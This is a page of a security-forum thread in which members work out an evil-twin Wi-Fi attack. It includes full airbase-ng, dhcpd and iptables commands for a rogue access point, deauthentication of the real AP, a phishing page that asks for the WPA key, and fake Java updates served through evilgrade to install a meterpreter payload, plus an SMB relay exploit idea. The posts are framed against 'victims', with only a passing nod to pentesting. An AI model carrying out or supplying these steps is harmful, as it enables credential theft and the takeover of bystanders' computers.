Page 3 of 6 FirstFirst 12345 ... LastLast
Results 21 to 30 of 56

Thread: Bruteforce attack useless

  1. #21
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Ok, This thread is exactly what I am trying to do myself. I just have a few problems that I need to solve.

    What I have working: Evil Ap, Aireplay is doing a massive DDOS to the victims AP, All clients are not associated and are probing the ESSID.

    Ok, so the basics is done

    Now I need to get the DHCP server up and running to assign ip address's to the clients.

    I downloaded dhcp-3.0.7 from the ISC site, but I am having problems installing it. Not sure if its compatible with Backtrack3. Any ideas here? This is the error is piping to me
    Code:


    create a file named /etc/dhcpd.conf and put this in it

    option subnet-mask 255.255.255.0;
    option routers 10.8.253.254;
    filename "pxeboot";

    ddns-update-style none;

    option domain-name "google.com";
    option broadcast-address 10.8.253.255;
    option domain-name-servers 10.8.0.7;
    server-name "DHCPserver";
    server-identifier 10.8.253.201;

    default-lease-time 7200;
    max-lease-time 7200;

    subnet 10.8.253.0 netmask 255.255.255.0 {
    next-server 10.8.253.201;
    range 10.8.253.29 10.8.253.200;
    }

    and run "dhcpd ath0", this will serve ip address to any one that connects.
    Hope it helps, command are on bt3

  2. #22
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I'm trying to make it that after they connect to you AP and you get the WPA passphrase you then cancel the connection and then mimic the real AP with wpa, and then forward the traffic the clients to the real AP.
    I have tryed this
    ifconfig rausb0 0.0.0.0
    ifconfig eth0 0.0.0.0

    brctl addbr br0
    brctl addif br0 rausb0
    brctl addif br0 eth0 (just testing at the moment)

    ifconfig br0 up
    route add default gw 192.168.1.1
    iptables -A FORWARD -i rausb0 -o eth0 -j ACCEPT
    iptables -t nat -j POSTROUTING -A MASQUERADE

    on my softAP and can still surf the net, and on the targget cleint i can sometimes ping google, but the computer doesn't display the web page.
    I am useing ad-hoc between target client and softAP, no encrytion is used.

    ? why doesn't the target cleint not able to browse internet, and if its dns(ping goes through) why does ping work, but dns doesn't

    Thanks

  3. #23
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    What a brilliant way of approach. You guys are pretty impressive. Truly out-of-the-box thinking :b.
    If one could combine evilgrade Java update with a WPA stealing payload, a phishing website which all dns lookup's point to on the rogue AP
    which ask for the WPA key, and at the same time spamming deauthentication packets to the genuine AP, the WPA-key will be easily attained
    in a matter of time. I wish I could help but programming (C) is still very new to me.

    Compaq I like your thoughts on forwarding the traffic, but I think a better approach would be to create a method on which the rogue-ap performs
    an ifconfig wlan0 DOWN once the key is attained and verified on the real AP. Because I doubt the forwarding will be stable enough.

    But before evilgrade can be implemented in the attack, the Java part of it has to be fixed. ShadowKill was going to take a look at it but I don't think he has
    accomplished anything yet. Try taking a look at this thread: http://forums.remote-exploit.org/showthread.php?t=17752.
    - Poul Wittig

  4. #24
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    This is what I plan to do

    Create my evil ap, setup dhcp server and allow victim to happily surf the net <--- easily done with airbase-ng, dnsmasq

    I then the let the user happily surf the internet whilst i prepare my payload <--------- this is working too

    I create a meterpreter.exe and setup the listening side <-------------easily done

    i then use this exe with evil grade and get that up and ready <---------- this is easy too

    From there I create my fake splash screen, and then edit dnsmasq to forward all traffic to my apache server. The apache server says " Java outdated, please update by going to control panel, java " etc etc, with screenshots, <---------- easy

    This makes the victim feel more secure, goes to upgrade, evilgrade kicks in, meterpreter is executed <------- a bit of dnsmasq editing to forward javaupdate to evilgrade.




    and then you restart dnsmasq to allow traffic once again

    Victim can now happily surf the net whilst you do your business

  5. #25
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Quote Originally Posted by compaq View Post
    I'm trying to make it that after they connect to you AP and you get the WPA passphrase you then cancel the connection and then mimic the real AP with wpa, and then forward the traffic the clients to the real AP.
    I have tryed this
    ifconfig rausb0 0.0.0.0
    ifconfig eth0 0.0.0.0

    brctl addbr br0
    brctl addif br0 rausb0
    brctl addif br0 eth0 (just testing at the moment)

    ifconfig br0 up
    route add default gw 192.168.1.1
    iptables -A FORWARD -i rausb0 -o eth0 -j ACCEPT
    iptables -t nat -j POSTROUTING -A MASQUERADE

    on my softAP and can still surf the net, and on the targget cleint i can sometimes ping google, but the computer doesn't display the web page.
    I am useing ad-hoc between target client and softAP, no encrytion is used.

    ? why doesn't the target cleint not able to browse internet, and if its dns(ping goes through) why does ping work, but dns doesn't

    Thanks
    this is what i did awhile ago

    change as you please, this forwards traffic to internet through your pc
    replace wlan0 with eth0 if you have a hard wired net connection, this is something I have done in backtrack, since then I moved onto the new kubuntu 8.1 in which I will be using dnsmasq, principles are the same.

    you also need to edit dhcpd leases first though

    ifconfig wlan1 down
    rmmod ndiswrapper
    modprobe r8187
    modprobe tun
    ifconfig wlan1 up
    airmon-ng start wlan1
    airbase-ng -P -C 30 -e "Wifi100" -v wlan1

    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    cd /
    cd etc
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo > dhcpd.leases
    killall dhcpd
    dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
    dhcp.conf file at /etc looks like
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    range 10.0.0.20 10.0.0.50;
    }

    hope this fixes it for you

  6. #26
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    ok then how about this

    the redirected webpage contains both instruction to upgrade java and the smb relay exploit, whichever we get first is great. I was thinking along the karmetasploit route of multiple exploits but that would be too noticeable with the page clicks.

    I intend to have this up and running by next week providing no major problem
    Once we sort the manual steps out we can then automate the whole thing at a later stage.

  7. #27
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Some more updates, I don't think we need to use evil grade..

    lets look at a normal upgrade for java

    (1) Request update from control panel in java links to this site
    http://javadl-esd.sun.com/update/1.6.0/map-1.6.0.xml

    can someone with an older version of java use wireshark and let us know where it looks for the update xml, 1.5? 1.4? etc

    we replace any requests going to this page to our own update - .xml file

    (2) If upgrade is present it then goes to this url
    http://javadl-esd.sun.com/update/1.6.0/1.6.0_07-b06.xml


    http://javadl.sun.com/webapps/download/GetFile/1.6.0_07-b06/windows-i586/jre-6u7-windows-i586-p-iftw.exe</

    we replace that exe with our package


    does this make sense?

    that all there is to it i think, it's the xml files that need modifying

    either we download all the files in the /update directory at sun java

    or we somehow spoof java.sun.com/update/whatever to one our own xml file, regardless of the version/directory, thus there will always be a fake update regardless of version number

  8. #28
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Wow guys this is an awsome thread! Ive been trying to accomplish this very same thing for a while now.
    Create a tranparent evilgrade+karmetasploit AP that spoofs the orignal AP, hit the real ap with a DOS attack and force a recconect to your fake AP. Once they are surfing over your connection you have so many options for getting a shell it would seem impossible not to be able to get one even on a full updated box.

    I have integrated karmetsploit with DNS spoofing and evilgrade already but getting the dhcp service running correctly was my only obsticle. Now that some posters have graciously explained how to do this I am hoping to be able to get everything working as planned. I will try this as soon as possible and report back to let you know how its going!
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  9. #29
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    yes there are so many avenues we can follow once they are surfing through us,

    i would just have redirect in place until the user updates java... others may want to try exploits which IMO are quickly patched by many users

    as with all pentesting we discuss ways on how to prevent such exploitation

  10. #30
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    How about this --

    we redirect all traffic via iptables to a squid proxy and also squirm, which then gives us greater flexibility in the future

    we can then use modules provided by evilgrade - do a bit of editing and that solves our version problem with java.


    so initially we setup iptables to forward all traffic to the internet, once exploit is ready, we then redirect to squid until some exploit takes and then iptables again back to legit internet.

    or other options include any exe's with our payload

Page 3 of 6 FirstFirst 12345 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •